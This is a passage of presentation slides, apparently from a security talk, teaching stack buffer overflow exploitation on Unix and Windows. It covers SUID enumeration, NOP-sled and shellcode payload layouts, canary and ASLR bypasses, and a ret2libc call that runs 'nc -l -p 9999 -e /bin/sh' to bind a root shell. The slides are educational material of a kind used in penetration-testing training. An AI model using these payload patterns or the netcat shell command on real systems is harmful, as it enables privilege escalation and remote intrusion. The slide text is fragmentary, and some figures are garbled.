3. “There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode
They are the complement of each other”
“Sleepy Kama”
#Inspiration
8. VULNERABLE UNIX APPLICATION
Has permission “root” as user or group
SUID or SGID is set (Sting S at eXecute bit)
This 2 criteria provided privilege escalation to be root
list="$(find / -perm -4000 -o -perm -2000)";for i in
$list; do ls -al $i; done
ls –R / | grep “wsr” | grep “root”
10. VULNERABLE UNIX APPLICATION
Use vulnerable input standard function
Ex: strcp(), gets(), sprintf (), vsprintf ()
They make the program can possibly segmentation
fault or buffer overflow
21. BUFFER OVERFLOW
The situation when the data that input to the
system is larger than the size of buffer that
declare to be used
AAAAAAAAAA....[607 of A]….AAAx00 SFP RP
AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAAx00
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault”
“Illegal Instruction”
SFP RP
Ex: char pw[608];
22. “How can we detect
buffer overflow in unix application?”
35. “Imagine if we can control Return Pointer to
our own Instruction”
“So, we can control the whole system”
36. SHELL CODE
[Malicious Machine OpCode] + AAAAAAAAAAAAAAA
SFP = 0x41414141
***RP = 0xFBFF0544
0xFBFF0544
0xFBFF0544
SFP RP
Attacker can control return pointer to run Malicious
Machine OpCode that put to memory (Shell Code).
Insert shell code as a part of input to reduce the
complexity of exploitation
37. SHELL CODE
Shell code is the code that attacker want the
system run in order to operate the command as
attacker need (create form assembly and convert
to OpCode
Ex;
Open port for connection to that system with root privilege
Add user to the system
Run shell as root privilege
Shell code is written as Hexadecimal format
38. “What happen if we can make Return Pointer
system_call /bin/sh
by programrun as root ?”
43. Where can we get shell code use to make exploit. ?
Create your own shell code (quite take time)
Use Metasploit to generate shell code
Metepreter
Search from internet
shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits
SHELL CODE
73. LIMITED STACK SPACE
[ NOP Space (NOP Sledding)] + [S h e l l C o d e ]
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We don’t know yet)
0xFBFFxxxx
0xFBFFxxxx
SFP RP
If size of buffer is limited, we need to put some
shell code some where in stack and control RP to
run shell code
77. Demo #3
Exploit to get root privilege
With Limited Stack Space
LIMITED STACK SPACE
78. SUMMARY
Grant()main()AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90 x90x90x90x90x90x90 + [Shell Code]AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA
Bypass password protection
Buffer overflow to run shellcode to get root privilege
Buffer overflow to run shellcode with limited Stack Space
83. Characteristic of vulnerable program
Has set SUID, GUID
Can Overflow
Use Libc.
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
84. “What happen if we jump RP and run?”
system_call nc –l –p 9999 –e /bin/sh
85. Fool program to make system call with evil
command
System_call nc -l -p 9999 -e /bin/sh
AAAAAAAAAAAAA
If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root”
So, “nc –l –p 9999 –e /bin/sh” run as “root”
SFP
RP Argsystem
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
86. Find location of “system” call function
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
87. Create “evil” Argument as system global variable
AAAAAAAAAAAAA
SFP RP =
Argsystem
xf0x4execxb7 x98xfaxffxbfNC =
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
115. STACK GUARD (CANARY)
Protection mechanism place in stack (8 byte) to detect
the overflow and preventing to control RP
Need to include when we compile program
gcc -fstack-protector code.c -o myprogram
If canary overwritten the program will be terminated
Type of Canary
NULL canary (0x00000000)
Terminator canary (0x00000aff – 0x000aff0d)
Random canary (Unpredicted 4 byte)
AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA
SFP RPCanary
116. For Null canary and Terminator canary can be
defeated by “Canary repaired”
NULL canary only app use gets() function
AAA…AAA00000000AAAA[RP]x90x90x90x[Shellcode]x0a
Terminator canary (always 0x00000aff)
app use gets() function
app use strcpy() function and need more than 1 arg
AAA…AAAAAAA0affAAAA[RP]x90x90x90x[Shellcode]00
BBB…BBBBB00
CCC…CCC00
AAA…AAA00000affAAAA[RP]x90x90x90x[Shellcode]
STACK GUARD (CANARY) DEFEAT
Arg1=
Arg2=
Arg3=
122. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR)
Technique use prevent an attacker jumping to a
particular exploited code in memory by random
the virtual address in every runtime.
123. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR)
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP…….
Random is 2 So, Possibility =1/2 or 0.000001
20 20
How can we increase possibility to jump to shell code ?
124. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ]…….
JMP ESP
esp
If OS kernel has some static lib kernel < 2.6.20.
Use JMP ESP (Trampoline) instruction in that
static lib to bring RP to shell code
INC EAX ADD EBS, EBP ….
125. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
If OS kernel has not static lib (kernel >= 2.6.20 ),
need to write application to call vulnerable
application to limit random address space (App wrap
up)
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]
Check current ESP value
and Set
RP = ESP + [vul app buffer]
126. Wrap up app
ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
129. DIFFERENCE OF UNIX AND WINDOWS
APPLICATION EXPLOIT
Unix application directly communicate to kernel
Window application must communicate through
Window API (Not directly communicate to
kernel) . It’s make more difficult to exploit
App Kernel
App KernelAPI
130. WINDOW SHELLCODE
Static Shellcode (Example for window XP)
Static or fix memory address of windows API that use
in exploit code (Specific OS version and SP)
Find address of WinExec() > use to execute cmd / app
Find address of ExitProcess() > use to clear register
Portable Shellcode
Dynamically find memory address of need window
API by using 2 useful windows API
LoadLibraryA() to get Hmodule (DLL's base address )
GetProcessAddress() to get real address of function
Get address of WinExec()
Get address of ExitProcess()
131. Normally, virus use LoadLibraryA() and
GetProcessAddress() to make portable expliot
WINDOW SHELLCODE
135. Found the vulnerability of application
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
136. Input to the system is larger than the size of
buffer that declare to be used
AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP
char local[49];
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP
ESP
137. Find address to jump to exploit code
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
x90x90x90x90…[shellcode]…AAAAAAAA RP
* RP = “x40xffx13
138. Exploit Successful
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
Successfully exploit.
But calc.exe run as
your permission
not “Administrator”
139. Imagine, if some windows application provide
network service like FTP that start by
“SYSTEM” account and have buffer overflow
vulnerability (Ex: WarFTP app)
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
142. BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
FTP 192.168.1.2
USER AAAAAA….AAAA $JMP_ESP x90x90x90x90 SYSCODE
RP
ESP
143. After connect back to open port, user/password
to the system to confirm that we successfully get
system privilege
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
144. Rule of permission gaining in Windows exploit
If we exploit the application, we will get the
permission as who start or run the application
If application or service start or run by
“Administrator” or “SYSTEM” account, we will gain
“Administrator” or “SYSTEM” privilege
All windows vulnerability that attacker use to
compromise OS occurred form successfully exploit
“SYSTEM” service
BASIC WINDOWS EXPLOITATION
145. DLL injection exploitation
SafeSeh (Structured Exception Handling) and Abuse
Windows ASLR and how to defeat
Windows DEP and how to defeat
GS protection in Windows application and how to defeat
Advance pivoting attack technique
HEAP overflow / Heap Spray / Use After free
“Unfortunately, We have not enough time to walk through”
MORE INTERESTING TOPIC FOR WINDOWS
146. CoreLAN team : https://www.corelan.be
NetSEC : http://netsec.ws/?p=180
http://www.cis.syr.edu/~wedu/education/buffer_ov
erflow.html
LEARNING SITE
147. REFERENCE
SANS 660 Advanced Penetration Testing, Exploit
Writing, and Ethical Hacking
GIAC GXPN : Exploit Researcher and Advanced
Penetration Tester
Protecting Against Address Space Layou
Randomization (ASLR) Compromises and Return-to-
Libc Attacks Using Network Intrusion Detection
Systems. David J. Day, Zheng-Xu Zhao, November
2011, Volume 8, Issue 4, pp 472-483
Cowan, C. Buffer Overflow Attacks.
StackGuard:Automatic Adaptive Detection and
Prevention of Buffer-Overflow Attacks. 1 October
2008.
Defeating PaX ASLR protection. Durden, T. 59, s.l.
:Phrack, 2002, Vol. 12.